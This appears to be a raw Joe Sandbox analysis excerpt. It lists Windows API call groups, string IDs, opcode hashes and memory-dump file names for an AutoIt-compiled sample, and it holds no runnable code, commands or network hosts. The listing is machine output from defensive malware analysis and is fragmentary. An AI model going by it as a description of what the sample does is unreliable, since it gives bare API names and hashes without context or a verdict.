                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3401586794-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                                                    • API String ID: 668425406-1075368562
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongMessageSendWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3360111000-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 161812096-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 395352322-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3761583154-0
Similarity
• API ID: AllocByteCharMultiStringWide
• String ID:
• API String ID: 3603722519-0
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: f$p
                                                                                                                                                                                                                    • API String ID: 3215553584-1290815066
APIs
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
APIs
Similarity
• API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 564229958-0
Strings
Similarity
• API ID:
• String ID: %.15g$0x%p$False$True
• API String ID: 0-2263619337
APIs
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
APIs
Similarity
• API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
• String ID:
• API String ID: 383626216-0
APIs
Similarity
• API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
• String ID:
• API String ID: 2082702847-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 179993514-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                    • API String ID: 1653399731-2785691316
                                                                                                                                                                                                                    • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                                                                                                                    • Instruction ID: e04d8935f1b698f6f79e6f74bc31bbc7a49b24ad51cb370bc2436f45f7b88711
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50B1AF72A08B418AEB50CF61D4401AD7BB0FB84798F580636EE8DA7B58DF79E545CB40
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF656D4BF47), ref: 00007FF656D4CE29
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                    • API String ID: 2358735015-567219261
                                                                                                                                                                                                                    • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                                                                                                                                                    • Instruction ID: c9b5a88aafd485283bca2adac7cf7b7b204707fdb7ce422652d23215f7d0623b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B91C122B1A65782EA648F26D4415B923A0BB15791B584B31DE9DF3BD4DFBFEC42C300
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                                                                                                                    • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                                                                                                                    • Instruction ID: 75346cec77d2b8c490f9f44e35789e1652bcda73a9dfa74ed9572df0b43ca91f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2791BF66B08B9285EB10DF65E4401AD3374FF88B88F494A32DE8EA7755DF7AE845C340
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00007FF656D20EDB
                                                                                                                                                                                                                      • Part of subcall function 00007FF656D20B90: CharUpperBuffW.USER32(?,?,00000001,00007FF656D20F61), ref: 00007FF656D20C6A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharForegroundUpperWindow
                                                                                                                                                                                                                    • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                                                                                                                                                    • API String ID: 3570115564-1994484594
                                                                                                                                                                                                                    • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                                                                                                                                    • Instruction ID: 28382312b6abbcb59a0153f44089fbfcab2308eac25d0580ff44971d0b6856dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09719252B0968381FE649B66DC012BE62A1AF54784F8C8B31DA0EE67D5EF3EE544C340
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                                                                                                                    • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                                                                                                                    • Instruction ID: 62c83b788620a278c9a35924cb21a022ed08f0cf52a5dc462a2eb4e0ea0565c9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A41D772F1975345EB608F279C44179A291AB64BE0B981B31CA5DE77D4EE3FE852C300
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: #$E$O
                                                                                                                                                                                                                    • API String ID: 3215553584-248080428
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 3196045410-1173974218
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$ClassName
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 787153527-1403004172
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLasthtonsinet_ntoa
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2227131780-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3451389628-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3659116390-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3740051246-0
APIs
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D176
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D217
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D236
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D281
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D2A0
  • Part of subcall function 00007FF656CD4120: WideCharToMultiByte.KERNEL32 ref: 00007FF656CD4160
  • Part of subcall function 00007FF656CD4120: WideCharToMultiByte.KERNEL32 ref: 00007FF656CD419C
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
APIs
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2939132127-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2655805287-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2067211477-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2117695475-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D3003C
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D30047
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D30055
                                                                                                                                                                                                                    • ~SyncLockT.VCCORLIB ref: 00007FF656D3005E
